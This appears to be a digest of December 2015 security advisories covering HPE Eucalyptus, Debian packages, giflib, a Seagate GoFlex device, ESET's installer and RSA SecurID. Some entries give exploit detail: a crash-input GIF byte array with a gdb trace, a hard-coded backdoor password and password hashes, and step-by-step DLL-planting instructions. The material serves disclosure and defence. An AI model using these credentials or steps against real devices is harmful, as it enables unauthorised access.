[security bulletin] HPSBGN03527 rev.1 - HPE Helion Eucalyptus, Remote Access Restriction Bypass

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n
a-c04926482

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04926482
Version: 1

HPSBGN03527 rev.1 - HPE Helion Eucalyptus, Remote Access Restriction Bypass

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-12-21
Last Updated: 2015-12-21

Potential Security Impact: Remote Access Restriction Bypass, Increase in
Privilege

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HPE Helion
Eucalyptus. The vulnerability could be exploited to bypass access permissions
by a remote authenticated user.

Notes:

  - In Eucalyptus, following the AWS model, IAM roles are used to temporarily
allow users or services to access resources within or across accounts. Access
to roles is determined by the role.s trust policy and a set of user
permissions. The trust policy is associated with a role and defines which
accounts or services are allowed to assume the role. User permissions are
defined by the policy associated with the user, and define a set of actions
and resources that the user is allowed to access.

  - An issue has been identified in how Eucalyptus checks user permissions
when allowing a user to assume a role. Given that the grant policy allows the
user.s account to assume the role, any user in that account would be able to
assume the role, even if the user.s policy does not explicitly grant the
AssumeRole permission for the role. As a result, in some cases authenticated
users could gain privileges by assuming an IAM role that they were not
intended to have access to. The impact is mitigated by the fact that the
role.s trust policy still has to explicitly authorize the user.s account to
access the role.

References:

  CVE-2015-6861
  PSRT102965

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HPE Helion Eucalyptus 3.4.0 to 4.2.0

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2015-6861(AV:N/AC:H/Au:S/C:P/I:P/A:P)   4.6
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HPE has made the following software updates available to resolve the
vulnerability.

  - HPE Helion Eucalyptus 4.2.1

  Instructions for downloading and upgrading to the latest HPE Helion
Eucalyptus software are available at the following location:

  http://www8.hp.com/us/en/cloud/helion-eucalyptus-downloads.html

HISTORY
Version:1 (rev.1) - 21 December 2015 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability with any HPE supported
product, send Email to: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2015 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.

[SECURITY] [DSA 3429-1] foomatic-filters security update

[Salvatore Bonaccorso]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3429-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
December 21, 2015 https://www.debian.org/security/faq
- -

Package: foomatic-filters
CVE ID : CVE-2015-8327 CVE-2015-8560
Debian Bug : 806886 807993

Michal Kowalczyk and Adam Chester discovered that missing input
sanitising in the foomatic-rip print filter might result in the
execution of arbitrary commands.

For the oldstable distribution (wheezy), these problems have been fixed
in version 4.0.17-1+deb7u1.

For the stable distribution (jessie), these problems have been fixed in
version 4.0.17-5+deb8u1.

For the unstable distribution (sid), these problems have been fixed in
version 4.0.17-7.

We recommend that you upgrade your foomatic-filters packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJWeEE+AAoJEAVMuPMTQ89EMqoP/R0az90cDSfPJdCG534KMRGL
JXgzJsvo8HV7ez4pi/3gJS3uJB1H7oAgsr5DVpn1H7b0ur30NKbxCe+JUoBOWhSw
kSXYBH59v/RFL3y3V253qGDbhpyhFk2iyWOK9OgRfMClLGOQIKWu8wiBxO1BS7wa
OITdatU1UQdRO5beygPRf/JgtIAJ+GMJ+oeUOkRcICpawfIny6IGmgsPiYmZ1nL4
RS8dCqttKYmp92Er0JZSAzUdgC8Br78+IuN1PEir3GohNAFZLGXEIuPgW962VMag
BEqeWATPB1TxLc5Jiw9zaTPD3KNM8kU0N1n3AiONfDRMVCL4XPjZGbTvydLk5eit
MGNs+1PXsfsNZa3Hz9QHd72o+zDL+BjmzZMEklRsMIUQDnz5Vui9Er2CX2kGltYg
9OSwt0gvKyomf0bzTVYbU+oxO3E2Ebg5dhRKJxCgxr9UV0XxOIFmCGbi5G/9r9wT
LjBmx9dZbUp6Pb4dm93LVbLFY5xMHNQ4TYKaOd49C9u+4S3mq/GTs8GWr5mJFFBO
oqJlkMlYsW2xuFNSJibku7HwVR3OYqUAwgiCDtRCroPR/3RPugg/uzPn2eGf16E9
3JiSl9tDTWg0HlntBJy8QFKLrTdi5myuki/OeXvZ/cHFCBs7x+s4sR22J9NaekvS
Zr5vPTs/l5D+x9ri4UnA
=P4XZ
-END PGP SIGNATURE-

[security bulletin] HPSBGN03526 rev.1 - HPE Helion Eucalyptus, Remote Access Restriction Bypass, Unauthorized Modification

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n
a-c04926463

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04926463
Version: 1

HPSBGN03526 rev.1 - HPE Helion Eucalyptus, Remote Access Restriction Bypass,
Unauthorized Modification

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-12-21
Last Updated: 2015-12-21

Potential Security Impact: Remote Access Restriction Bypass, Unauthorized
Modification

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HPE Helion
Eucalyptus. The vulnerability could be exploited to bypass access permissions
by a remote authenticated user resulting in unauthorized modification.

Note:

  This is an update to the Eucalyptus security advisory for 4.1.1 and earlier
previously published at:

  https://www.eucalyptus.com/resources/security/advisories/esa-32

  This bulletin applies to that advisory but now includes HPE Helion
Eucalyptus v4.2.0 for this vulnerability also.

References:

  CVE-2014-5040
  PSRT102966

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Helion Eucalyptus v4.1.1 and earlier, v4.2.0

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2014-5040(AV:N/AC:H/Au:S/C:P/I:P/A:P)   4.6
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HPE has made the following software updates available to resolve the
vulnerability.

  - HPE Helion Eucalyptus 4.2.1
  - HPE Helion Eucalyptus 4.1.2

  Instructions for downloading and upgrading to the latest HPE Helion
Eucalyptus software are available at the following location:

  http://www8.hp.com/us/en/cloud/helion-eucalyptus-downloads.html

HISTORY
Version:1 (rev.1) - 21 December 2015 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability with any HPE supported
product, send Email to: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2015 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBAgAGBQJWeDrZAAoJEGIGBBYqRO9/bVUH/i4dyZ2slET0ddg5mSPHNIND
zO/3a1vP6UZQD+C+ti34+fNdcQnwpDbxMp/d5AAWT3aAQvb2JBeqJTvnM1+nF9lz
BCkQ4zuisa9jh21kqWqwFJBvRcw54iPuCu5QUAZPDJb7ZhTjZISDJF4LKiqghCzN
LU24inhngRcZhMxIVC1x5ZRUB+0RrnCSbsbEmJPhwOG9DwCSpSljv+ZG+Iq5tT2T
cSjjB0NUjWmi/2fQdTEZ6kjZxDxJ1GHP11VhivwiUddAT++te4VZdAyGvGgdqiKk
Fhj1Zt7l6TBrTK4vPv1fUodnCPHZDt0FkKChmepuUaL7HekA5uFyeeZiukGWg/I=
=RlAC
-END PGP SIGNATURE-

giflib: heap overflow in giffix (CVE-2015-7555)

[Hans Jerry Illikainen]

About
=

giflib[1] is a library for working with GIF images.  It also provides
several command-line utilities.


CVE-2015-7555
=

A heap overflow may occur in the giffix utility included in giflib-5.1.1
when processing records of the type `IMAGE_DESC_RECORD_TYPE' due to the
allocated size of `LineBuffer' equaling the value of the logical screen
width, `GifFileIn->SWidth', while subsequently having
`GifFileIn->Image.Width' bytes of data written to it.


giflib-5.1.1/util/giffix.c #35..194:
,
| int main(int argc, char **argv)
| {
| [...]
| if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
| GIF_EXIT("Failed to allocate memory required, aborted.");
| 
| /* Scan the content of the GIF file and load the image(s) in: */
| do {
| [...]
| switch (RecordType) {
| case IMAGE_DESC_RECORD_TYPE:
| if (DGifGetImageDesc(GifFileIn) == GIF_ERROR)
| QuitGifError(GifFileIn, GifFileOut);
| [...]
| Width = GifFileIn->Image.Width;
| Height = GifFileIn->Image.Height;
| [...]
| /* Find the darkest color in color map to use as a filler. */
| ColorMap = (GifFileIn->Image.ColorMap ? 
GifFileIn->Image.ColorMap :
|  GifFileIn->SColorMap);
| for (i = 0; i < ColorMap->ColorCount; i++) {
| j = ((int) ColorMap->Colors[i].Red) * 30 +
| ((int) ColorMap->Colors[i].Green) * 59 +
| ((int) ColorMap->Colors[i].Blue) * 11;
| if (j < ColorIntens) {
| ColorIntens = j;
| DarkestColor = i;
| }
| }
| 
| /* Load the image, and dump it. */
| for (i = 0; i < Height; i++) {
| GifQprintf("\b\b\b\b%-4d", i);
| if (DGifGetLine(GifFileIn, LineBuffer, Width)
| == GIF_ERROR) break;
| if (EGifPutLine(GifFileOut, LineBuffer, Width)
| == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
| }
| 
| if (i < Height) {
| [...]
| /* Fill in with the darkest color in color map. */
| for (j = 0; j < Width; j++)
| LineBuffer[j] = DarkestColor;
| for (; i < Height; i++)
| if (EGifPutLine(GifFileOut, LineBuffer, Width)
| == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
| }
| break;
| [...]
| }
| }
| while (RecordType != TERMINATE_RECORD_TYPE);
| [...]
| }
`

,
| $ gdb -q --args ./giffix heap.gif
| Reading symbols from ./giffix...done.
| (gdb) b util/giffix.c:94
| Breakpoint 1 at 0x401131: file giffix.c, line 94.
| (gdb) b util/giffix.c:148
| Breakpoint 2 at 0x401449: file giffix.c, line 148.
| (gdb) b util/giffix.c:149
| Breakpoint 3 at 0x401452: file giffix.c, line 149.
| 
| (gdb) commands 3
| Type commands for breakpoint(s) 3, one per line.
| End with a line saying just "end".
| >printf "%p, 0x%02x\n", LineBuffer+j, DarkestColor
| >c
| >end
| 
| (gdb) r
| [...]
| Breakpoint 1, main (argc=2, argv=0x7fffe6b8) at giffix.c:94
| 94  if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
| 
| (gdb) p GifFileIn->SWidth
| $1 = 1
| 
| (gdb) c
| [...]
| Breakpoint 2, main (argc=2, argv=0x7fffe6b8) at giffix.c:148
| 148 for (j = 0; j < Width; j++)
| 
| (gdb) p Width
| $2 = 255
| 
| (gdb) c
| Continuing.
| 
| Breakpoint 3, main (argc=2, argv=0x7fffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618920, 0x01
| 
| [...]
| 
| Breakpoint 3, main (argc=2, argv=0x7fffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618940, 0x01
| 
| [...]
| 
| Breakpoint 3, main (argc=2, argv=0x7fffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618a1e, 0x01
| 
| Program received signal SIGSEGV, Segmentation fault.
| 0x77bd8658 in GifFreeMapObject (Object=0x101010101010101) at 
gifalloc.c:80
| 80  (void)free(Object->Colors);
`


heap.gif:
,
| unsigned char heap[] = {
| /* GIF87a */
| 0x47, 0x49, 0x46, 0x38, 0x37, 0x61,
| 
| /* DGifGetScreenDesc() */
| 0x01, 0x00, /* GifFile->SWidth */
| 0x01, 0x00, /* GifFile->SHeight */
| 0x80,   /* ColorCount = 1 << ((this & 0x07) + 1) */
| 0x00,   /* GifFile->SBackGroundColor */
| 0x00,   /* GifFile->AspectByte */
| 0x11, 0x11, 0x11,   /* GifFile->SColorMap->Colors[0] */
| 0x00, 0x00, 0x00,   /* GifFile->SColorMap->Colors[1] */
| 
| /* DGifGetRecordType() */
| 0x2c,   

[SECURITY] [DSA 3427-1] blueman security update

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-3427-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
December 18, 2015 https://www.debian.org/security/faq
- -

Package: blueman
CVE ID : not yet available

It was discovered that the Mechanism plugin of Blueman, a graphical
Bluetooth manager, allows local privilege escalation.

For the oldstable distribution (wheezy), this problem has been fixed
in version 1.23-1+deb7u1.

For the stable distribution (jessie), this problem has been fixed in
version 1.99~alpha1-1+deb8u1.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your blueman packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBAgAGBQJWdHTKAAoJEBDCk7bDfE42SXUQAK7gTqLDAT+FWNuZMySGutx7
Rte1scauuNirikqR3Gohpm9gYWJj6Rv89EYJE5X/e2nU1LIMybAvZfT3tk7LAEMd
VcwaOwYu7jsve4OwTtJnAq0pkE7Bumyor9FMFqrlQdCrqUGp+NgzdCkDoetKNr3G
tgJxSuYB4B3+i6nx8+gj+5K1pzuxrlOW+k/wLM4ZC5VLwXjH//97TMglfF/5IMX9
jb+7LPU60YjPogVH4Fm3+F0fsN70O0mdCtuAmeORbkfzpBJd3DTIvB+ZPabr5keY
7mGqul5o4D5V15xFU/OTCiq/qS+RTRjjx5cJYGkn863qC7D3h8ddQyoiUXjD4dai
fcOvqWn3RYj53OWTpDCIspDXVbZ0JVUAg3LeJMkOVelXYBFVCbNzZXLO1wqJub+l
bnZ9jbmSLdcLhS7CsU3c7DhwXlYlqdRf/t7/7jg1IJux/5ztXy0IKat3qoPYuAuU
3OnJDg7AsgZgVTFI+P3H3h3CKmddrcLCRUo/I4/6ChpexrQlhiKk8JDWxNX8T0Cn
ZIDd8GNIhY7iblCDHrBM3uE8ROkQfQaajPDN6f2+If0SLLqh7SwhVdSGLQNGBbtG
OHYL7h0cvjHgcsf1NmbiF4qDtjifnbZGftZ15g5EfhjDMtnQ1h10KTEaRcJTcSf6
3aePyVM3Ws5U4yR/Z+kN
=aL4m
-END PGP SIGNATURE-

KL-001-2015-007 : Seagate GoFlex Satellite Remote Telnet Default Password

[KoreLogic Disclosures]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

KL-001-2015-007 : Seagate GoFlex Satellite Remote Telnet Default Password

Title: Seagate GoFlex Satellite Remote Telnet Default Password
Advisory ID: KL-001-2015-007
Publication Date: 2015.12.18
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2015-007.txt


1. Vulnerability Details

 Affected Vendor: Seagate
 Affected Product: GoFlex Satellite
 Affected Version: 1.3.7
 Platform: Embedded Linux
 CWE Classification: CWE-288: Authentication Bypass Using an
 Alternate Path or Channel; CWE-798: Use of Hard-coded Credentials
 Impact: Remote Administration
 Attack vector: Telnet
 CVE-ID: CVE-2015-2874

2. Vulnerability Description

 Seagate GoFlex Satellite Mobile Wireless Storage devices
 contain a hardcoded backdoor account. An attacker could use
 this account to remotely tamper with the underlying operating
 system when Telnet is enabled.

3. Technical Description

 root@wpad:/tmp/jfroot# ls
 bin  boot  dev  etc  home  include  lib  linuxrc  media  mnt  proc
 satellite_app  sbin  share  srv  static  sys  tmp  usr  var
 root@wpad:/tmp/jfroot# cd etc
 root@wpad:/tmp/jfroot/etc# ls
 angstrom-version  default  fstabinit.d
 iproute2  motd org_passwd   protocols
 rc4.d rS.d terminfo udhcpc.d
 autoUpdURLdevice_table groupinittab
 issue mtab passwd   rc0.d
 rc5.d scsi_id.config   timestampudhcpd.conf
 avahi device_table-opkghost.confinputrc
 issue.net network  passwd-  rc1.d
 rc6.d services tinylogin.links  
udhcpd_factory.conf
 busybox.links fb.modes hostname 
internal_if.conf
 localtime nsswitch.confprofile  rc2.d
 rcS.d skel ts.conf  version
 dbus-1filesystems  hostsipkg
 mke2fs.conf   opkg profile.drc3.d
 rpc   syslog.conf  udev
 root@wpad:/tmp/jfroot/etc# cat passwd
 root:VruSTav0/g/yg:0:0:root:/home/root:/bin/sh
 daemon:*:1:1:daemon:/usr/sbin:/bin/sh
 bin:*:2:2:bin:/bin:/bin/sh
 sys:*:3:3:sys:/dev:/bin/sh
 sync:*:4:65534:sync:/bin:/bin/sync
 games:*:5:60:games:/usr/games:/bin/sh
 man:*:6:12:man:/var/cache/man:/bin/sh
 lp:*:7:7:lp:/var/spool/lpd:/bin/sh
 mail:*:8:8:mail:/var/mail:/bin/sh
 news:*:9:9:news:/var/spool/news:/bin/sh
 uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:*:13:13:proxy:/bin:/bin/sh
 www-data:*:33:33:www-data:/var/www:/bin/sh
 backup:*:34:34:backup:/var/backups:/bin/sh
 list:*:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:*:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
 xoFaeS:QGd9zEjQYxxf2:500:500:Linux User,,,:/home/xoFaeS:/bin/sh

 The xoFaeS user cracked to etagknil.

4. Mitigation and Remediation Recommendation

 The vendor has released a patch that can be
 obtained using the Download Finder located at
 https://apps1.seagate.com/downloads/request.html

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2015.09.11 - Vulnerability details and PoC sent to Seagate.
 2015.09.15 - Seagate confirms receipt.
 2015.09.28 - Seagate indicates a patch is ready but not yet available to
  the public.
 2015.09.28 - KoreLogic asks Seagate if they have obtained a CVE-ID for
  the vulnerability.
 2015.10.27 - Seagate notifies KoreLogic that the patch is publicly
  available. Seagate indicates they are waiting for a CVE
  before releasing a security advisory.
 2015.12.08 - KoreLogic requests an update on the CVE-ID and associated
  Seagate advisory.
 2015.12.08 - Seagate responds with a link to
  http://www.kb.cert.org/vuls/id/903500
 2015.12.18 - Public disclosure.

7. Proof of Concept

 N/A

The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and 

Executable installers are vulnerable^WEVIL (case 13): ESET NOD32 antivirus installer allows remote code execution with escalation of privilege

[Stefan Kanthak]

Hi @ll,

the executable installer [°] of ESET's NOD32 antivirus,
eset_nod32_antivirus_live_installer_.exe, loads and executes
(at least) the rogue/bogus/malicious Cabinet.dll and DbgHelp.dll
eventually found in the directory it is started from ['] (the
"application directory").

For software downloaded with a web browser this is typically the
"Downloads" directory: see
,

and 

If Cabinet.dll or DbgHelp.dll get planted in the users "Downloads"
directory per "drive-by download" (or "social engineering") this
vulnerability becomes a remote code execution.

Due to the application manifest embedded in the executable which
specifies "requireAdministrator" the installer is started with
administrative privileges ("protected" administrators are prompted
for consent, unprivileged standard users are prompted for an
administrator password); execution of Cabinet.dll or DbgHelp.dll
then results in an escalation of privilege!


Proof of concept/demonstration:
~~~

(verified on Windows XP, Windows Vista, Windows 7, Windows Server
2008 [R2]; should work on newer versions too)

1. visit , download
    and store
   it as Cabinet.dll in your "Downloads" directory, then copy it as
   DbgHelp.dll;

2. download eset_nod32_antivirus_live_installer_.exe and store it in
   your "Downloads" directory;

3. run eset_nod32_antivirus_live_installer_.exe from your "Downloads"
   directory;

4. notice the message boxes displayed from the DLLs placed in step 1.

PWNED!


Unsuspecting users who follow the guidance on ESET's web site


| (1) Download the .exe file to your computer and double-click
| it to start installation.

are the typical victims!

JFTR: I REALLY love (especially snakeoil) companies which don't
  protect or at least warn their customers from even the most
  trivial handling errors!


See  plus
 and the still unfinished
 for more details and why
executable installers (and self-extractors too) are bad.


Mitigation(s):
~~

0. DON'T USE EXECUTABLE INSTALLERS [°]!

   If your favourite applications are not distributed in the native
   installer package format of the resp. target platform: ask^WURGE
   their vendors/developers to provide native installation packages.
   If they don't: dump these applications, stay away from such cruft!

1. Turn off UAC's privilege elevation for standard users and installer
   detection for all users:

   
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
   "ConsentPromptBehaviorUser"=dword: ; Automatically deny elevation 
requests
   "EnableInstallerDetection"=dword:

   See 


2. NEVER execute files in UNSAFE directories (like "Downloads" and
   and "%TEMP%")!

3. Deny execution (at least) in the "Downloads" directories and all
   "%TEMP%" directories and their subdirectories:

   * Add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of
 files in this directory for everyone, inheritable to all files
 in all subdirectories" (use CACLS.EXE /S: for example);

   * Use "software restriction policies" resp. AppLocker.

   Consider to apply either/both to every "%USERPROFILE%" as well as
   "%ALLUSERSPROFILE%" alias %ProgramData%" and "%PUBLIC%": Windows
   doesn't place executables in these directories and beyond.

   See  as well as
    plus
   ,
   

   or  and finally
   !


stay tuned
Stefan Kanthak


[°] Self-extracting archives and executable installers are flawed^W
b(rainde)ad in concept and dangerous in practice.

DON'T USE SUCH CRUFT!
ALWAYS use the resp. target platforms native package and archive
format.

For Windows these are .INF (plus .CAB) and .MSI (plus .CAB),
introduced 20 years ago (with Windows 95 and Windows NT4) resp.
16 years ago (with Office 2000).

Both .INF and .MSI are "opened" by programs residing in
%SystemRoot%\System32\ which are therefore immune to this kind
of "DLL and EXE Search Order Hijacking" attack.
Since both .INF and .MSI access the contents of .CAB directly
they eliminate the attack vector "unsafe temporary 

Almost no resp. only some mitigation(s) for "DLL hijacking" via load-time dependencies

[Stefan Kanthak]

Hi @ll,

in  I showed
general mitigations for DLL hijacking via runtime dependencies
().

DLL hijacking is but also possible via load-time dependencies
()!

Example:

Quite some executable installers use the function timeGetTime()
()
implemented in WinMM.dll (and NO other function from WinMM.dll).

BUT WHY?

This function yields the same result as GetTickCount()
()
implemented in Kernel32.dll.

The notable difference: WinMM.dll is NOT in the list of "known DLLs"
(), so EVERY program
which uses timeGetTime() from WinMM.dll instead of GetTickCount()
will load a rogue WinMM.dll which exports timeGetTime from its
application directory.

This means: such programs are vulnerable to DLL hijacking unless
run from SAFE locations like %ProgramFiles% or %SystemRoot% where
unprivileged users can't place a rogue WinMM.dll etc. in the
programs application directory.

More general: if an executable installer links to functions not
provided by "known DLLs" for all supported versions of Windows it is
vulnerable to DLL hijacking via load-time dependencies, and there is
NO mitigation except to run it from a safe location!

Now that's a typical "catch 22": an installers task is to write the
files of an application safely, i.e. without the possibility of
tampering, to safe locations, i.e. %ProgramFiles% and %SystemRoot%,
while the installer itself is located somewhere else, typically in
a user's "Downloads" or %TEMP% directory, which are but unsafe and
allow tampering via DLL hijacking.

TELL YOUR USERS! TELL YOUR CUSTOMERS! WARN THEM!

Or (better!): reduce your programs dependencies, i.e. stick to
the basics^Wfunctions provided by Kernel32.dll (and the other
"known DLLs") and eliminate the attack vectors for DLL hijacking
via WinMM.dll and other "unknown DLLs".

If you don't or can't: see above and WARN ALL YOUR USERS/CUSTOMERS!

JFTR: the list of "known DLLs" varies with different Windows versions!

Examples:

1. Version.dll was one of the "known DLLs" of Windows NT 5.x (resp.
   still is in Windows Embedded POSReady 2009): the (many) executable
   installers linked to its functions were/are therefore not
   vulnerable in Windows NT 5.x resp. Windows Embedded POSReady 2009.

   In newer versions of Windows Version.dll is none of the "known DLLs",
   so all executable installers using its functions became vulnerable
   to DLL hijacking then.

2. SetupAPI.dll is none of the "known DLLs" in Windows NT 5.x, but
   became so in newer versions of Windows: the (many) executable
   installers linked to its functions were/are vulnerable unter Windows
   NT 5.x resp. Windows Embedded POSReady 2009, but ain't vulnerable
   any more in all newer versions of Windows.


Conclusion: executable installers which link to "unknown DLLs" are in
general unsafe for normal users.

The only SAFE option for general use is: DUMP executable installers.


stay tuned
Stefan Kanthak

ESA-2015-177: RSA SecurID(r) Web Agent Authentication Bypass Vulnerability

[Security Alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ESA-2015-177: RSA SecurID® Web Agent Authentication Bypass Vulnerability

EMC Identifier: ESA-2015-177

CVE Identifier: CVE-2015-6851

Severity Rating: 6.6 (AV:L/AC:L/Au:N/C:C/I:C/A:N)

Affected Products: 
   -   RSA SecurID® Web Agent versions prior to 8.0.
 
Summary:  
RSA SecurID Web Agent contains a patch that is designed to fix a Authentication 
bypass vulnerability that may potentially be exploited by malicious users to 
compromise the confidentiality and integrity of the affected system. 

Details: 
RSA SecurID Web Agent could be affected by Authentication bypass vulnerability. 
 In versions prior to 8.0, when the browser window was idle for more than a 
configured amount of time, the session was not terminated instead a privacy 
screen (pop-up for re-authentication) was rendered. A malicious user, with 
local or physical access to the end user system, would be able to dismiss the 
privacy screen using DOM Inspector tool and continue using Web Agent without 
re-authentication.
 
Recommendation: 
The following RSA SecurID Web Agent release contains resolution to this 
vulnerability:
   -   RSA SecurID Web Agent version 8.0

RSA recommends all customers upgrade at the earliest opportunity. 


Obtaining Downloads:
To obtain the latest RSA product downloads, log on to RSA SecurCare Online at 
https://knowledge.rsasecurity.com and click Products in the top navigation 
menu. Select the specific product whose download you want to obtain. Scroll to 
the section for the product download that you want and click on the link.

Obtaining Documentation:
To obtain RSA documentation, log on to RSA SecurCare Online at 
https://knowledge.rsasecurity.com and click Products in the top navigation 
menu. Select the specific product whose documentation you want to obtain. 
Scroll to the section for the product version that you want and click the set 
link.

Severity Rating:
For an explanation of Severity Ratings, refer to the Knowledge Base Article, 
“Security Advisories Severity Rating” at 
https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA 
recommends all customers take into account both the base score and any relevant 
temporal and environmental scores which may impact the potential severity 
associated with particular security vulnerability.

Obtaining More Information:
For more information about RSA products, visit the RSA web site at 
http://www.rsa.com.

Getting Support and Service:
For customers with current maintenance contracts, contact your local RSA 
Customer Support center with any additional questions regarding this RSA 
SecurCare Note. For contact telephone numbers or e-mail addresses, log on to 
RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & 
Contact, and then click the Contact Us - Phone tab or the Contact Us - Email 
tab.

General Customer Support Information:
http://www.emc.com/support/rsa/index.htm

RSA SecurCare Online:
https://knowledge.rsasecurity.com

EOPS Policy:
RSA has a defined End of Primary Support policy associated with all major 
versions. Please refer to the link below for additional details. 
http://www.emc.com/support/rsa/eops/index.htm

SecurCare Online Security Advisories
Read and use the information in this RSA Security Advisory to assist in 
avoiding any situation that might arise from the problems described herein.  If 
you have any questions regarding this product alert, contact RSA Software 
Technical Support at 1-800-995-5095.  RSA Security LLC and its affiliates, 
including without limitation, its ultimate parent company, EMC Corporation, 
